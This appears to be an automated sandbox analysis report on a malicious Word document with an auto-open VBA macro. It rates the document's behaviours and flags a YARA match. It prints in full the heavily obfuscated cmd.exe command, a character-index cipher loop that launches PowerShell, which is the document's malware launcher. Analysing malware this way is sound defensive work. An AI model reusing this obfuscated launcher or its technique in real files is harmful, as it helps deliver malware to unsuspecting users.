8ed61abc...6ae9

Severity	Category	Operation	Classification
4/5	Process	Creates process	-
Creates process "Cmd.exe /V:ON/C"set begw=r$Oq\a+N,=^^oWR^&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd &&for %4 in (38,2,12,70,0,18,74,70,48,48,81,81,35,7,2,38,81,35,12,81,16,81,81,81,24,81,14,81,49,81,1,66,18,58,11,59,33,25,30,55,6,1,38,18,58,2,59,33,25,75,63,55,6,37,19,37,34,81,49,81,49,35,57,2,76,52,25,13,70,72,70,19,55,28,28,59,5,17,73,74,70,20,49,4,24,81,34,81,34,67,75,55,13,5,74,73,25,8,37,79,66,0,37,81,33,44,5,48,66,33,0,73,35,36,67,55,13,5,74,73,25,8,37,62,73,38,37,81,81,33,44,5,48,66,33,0,73,35,81,81,36,75,55,13,5,74,73,25,8,37,29,52,44,37,81,33,44,5,48,66,33,0,73,35,81,81,30,75,55,13,5,74,73,25,8,37,71,22,50,37,81,81,33,44,5,48,66,33,0,73,35,34,37,34,78,80,21,29,52,44,49,34,79,66,0,33,76,79,66,0,8,79,66,0,47,79,66,0,26,35,81,71,22,50,78,63,21,78,16,21,71,22,50,49,31,15,34,78,71,22,50,60,19,62,73,38,70,17,71,22,50,31,78,62,62,73,38,60,21,29,52,44,9,78,80,21,29,52,44,37,6,37,15,71,22,50,60,47,33,62,73,38,17,71,22,50,31,78,37,6,37,62,62,73,38,60,21,29,52,44,15,34,49,33,43,11,77,52,46,31,34,79,66,0,33,60,20,5,79,66,0,8,79,66,0,66,79,66,0,26,35,37,6,37,71,22,50,78,16,21,78,63,21,71,22,50,49,31,78,64,17,21,37,6,37,29,52,44,15,78,70,22,13,62,73,38,17,21,29,52,44,81,37,6,37,9,81,71,22,50,33,7,46,62,73,38,65,62,73,38,76,60,48,22,42,71,22,50,31,78,62,62,73,38,60,21,29,52,44,15,34,79,66,0,33,60,20,50,79,66,0,8,79,66,0,18,37,6,37,79,66,0,8,79,66,0,20,59,0,11,79,79,66,0,8,79,66,0,31,20,69,11,80,52,76,12,31,59,79,66,0,8,79,66,0,47,11,62,79,66,0,8,79,66,37,6,37,0,60,47,33,17,31,79,66,0,26,37,6,37,35,81,71,22,50,78,16,21,78,63,21,78,75,21,78,61,21,78,40,21,78,30,21,71,22,50,49,81,34,79,66,0,60,73,79,66,0,8,79,66,0,7,79,66,0,8,79,66,0,33,71,64,2,35,69,33,79,66,0,26,35,81,71,22,50,78,61,21,78,63,21,78,16,21,71,22,50,49,10,14,81,9,81,78,62,62,73,38,60,21,29,52,44,21,81,33,20,65,33,81,78,34,71,22,50,60,47,62,73,38,33,17,62,73,38,33,80,2,73,46,7,37,6,37,22,71,22,50,28,28,3,54,0,58,46,41,29,52,44,81,49,37,6,37,71,22,50,60,47,33,62,73,38,17,60,70,72,71,22,50,28,28,70,22,48,54,39,31,34,81,81,34,79,66,0,67,79,66,0,37,6,37,6,79,66,0,17,30,61,57,79,66,0,49,81,81,34,79,37,6,37,66,0,54,39,79,66,0,8,79,66,0,70,48,62,5,46,0,79,66,0,81,26,35,71,22,50,78,63,21,78,16,21,71,22,50,49,31,81,81,49,81,81,9,78,45,21,29,52,44,21,81,34,79,66,0,54,17,18,79,66,0,81,3,33,35,81,34,49,33,43,11,77,52,46,31,34,79,66,0,18,37,6,37,11,17,79,66,0,8,79,66,0,0,60,79,66,0,8,79,66,0,72,52,76,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,31,71,22,50,33,60,54,62,73,38,17,62,73,38,18,60,52,70,59,17,13,54,62,73,38,66,54,71,22,50,31,71,22,50,80,54,62,73,38,70,0,58,17,60,7,62,73,38,70,62,73,38,0,13,22,73,71,22,50,28,37,6,37,28,70,56,65,5,39,31,34,81,34,79,66,0,56,79,66,0,6,79,66,0,19,18,79,66,0,6,79,66,0,28,33,37,6,37,65,79,66,0,37,6,37,6,79,66,0,64,5,46,0,5,39,79,66,0,49,81,34,79,66,0,33,51,79,66,0,37,6,37,8,79,66,0,35,17,79,66,0,8,79,66,0,42,70,60,76,79,66,0,81,26,35,71,22,50,78,63,21,37,6,37,78,16,21,78,61,21,71,22,50,49,31,81,49,81,81,49,81,26,76,49,29,52,44,15,34,79,66,0,12,31,79,66,0,8,79,66,0,20,59,0,11,79,31,37,6,37,20,69,11,80,52,76,79,66,0,8,79,66,0,33,79,66,0,8,79,66,0,60,20,50,18,37,6,37,79,66,0,8,79,37,6,37,66,0,59,79,66,0,26,35,81,71,22,50,78,75,21,78,30,21,78,63,21,78,61,21,78,16,21,71,22,50,49,81,33,59,5,7,50,65,64,59,33,20,20,54,35,81,34,79,66,0,80,54,79,66,0,8,79,66,0,17,35,80,37,6,37,79,66,0,8,79,66,0,37,6,37,33,38,50,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,10,14,15,78,34,79,66,0,5,11,64,38,76,65,79,66,0,8,79,66,0,44,35,60,33,51,79,66,37,6,37,0,8,79,66,0,80,0,79,66,0,81,26,35,81,71,22,50,78,63,21,78,61,21,78,37,6,37,16,21,71,22,50,49,31,9,78,80,21,29,52,44,21,81,34,63,81,5,33,35,81,34,37,6,37,79,66,0,76,65,44,35,60,79,66,0,8,79,66,0,11,37,6,37,64,38,79,66,0,8,79,66,0,80,0,5,79,66,0,37,6,37,8,79,66,0,33,51,79,66,0,26,35,81,37,6,37,71,22,50,78,16,21,78,37,6,37,61,21,78,75,21,78,63,21,71,22,50,49,81,34,79,66,0,59,79,66,0,8,79,66,0,73,72,79,66,0,81,26,35,81,71,22,50,78,16,21,78,63,21,71,22,50,49,10,14,49,81,26,76,15,37,6,37,81,34,79,66,0,60,47,33,79,66,0,8,79,66,0,60,5,79,66,0,8,79,66,0,54,17,5,79,66,0,8,79,66,0,42,37,6,37,13,2,79,37,6,37,79,66,0,8,79,66,0,17,31,18,59,0,11,26,31,18,12,11,45,7,76,69,31,59,33,79,66,0,37,6,37,8,79,66,0,80,79,66,0,8,79,66,0,17,20,68,20,79,66,0,26,35,71,22,50,78,40,21,78,75,21,78,30,21,78,16,21,78,37,6,37,36,21,78,61,21,78,63,21,71,22,50,49,55,33,66,68,17,25,81,81,9,81,27,54,13,74,46,41,29,52,44,81,81,37,6,37,15,81,34,79,66,0,65,44,31,18,79,66,0,8,79,66,0,59,13,11,79,66,0,8,79,66,0,45,79,66,0,8,79,66,0,26,79,66,0,8,79,66,0,0,5,11,79,66,0,8,79,66,0,69,31,42,70,17,18,79,66,0,8,79,66,0,64,66,46,79,66,0,8,79,66,0,20,79,66,0,8,79,66,0,68,79,66,0,8,79,66,0,31,20,12,11,45,52,46,79,66,0,79,35,71,22,50,78,32,21,78,40,21,78,75,21,78,67,21,78,53,37,6,37,21,78,36,21,78,37,6,37,63,21,78,30,21,78,16,21,78,61,21,71,22,50,49,55,33,66,68,17,25,81,9,67,17,30,61,37,6,37,71,29,52,44,81,81,15,34,79,66,0,60,79,66,0,37,6,37,8,79,66,0,54,33,0,74,17,79,66,0,8,79,66,0,31,51,7,76,45,79,66,0,8,79,66,0,80,54,79,66,0,8,79,37,6,37,66,0,70,0,58,79,66,0,26,35,71,22,37,6,37,50,78,16,21,78,63,21,78,30,21,78,61,21,78,75,21,7". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\cmd.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". ... VTI Actions Go to function call
3/5	YARA	YARA match	-
Rule "Document_Contains_Execution_Commands" from ruleset "Malicious-Documents" has matched for "C:\Users\aETAdzjz\Desktop\(5)DOC20181114214.doc" ... VTI Actions Go to YARA match
2/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro automatically on target "auto" and event "open". ... VTI Actions Go to macro
1/5	Static	Contains suspicious meta data	-
Office document contains below average content data. ... VTI Actions Go to file details
1/5	VBA Macro	Contains Office macro	-
Office document contains a VBA macro. ... VTI Actions Go to file details

Before

After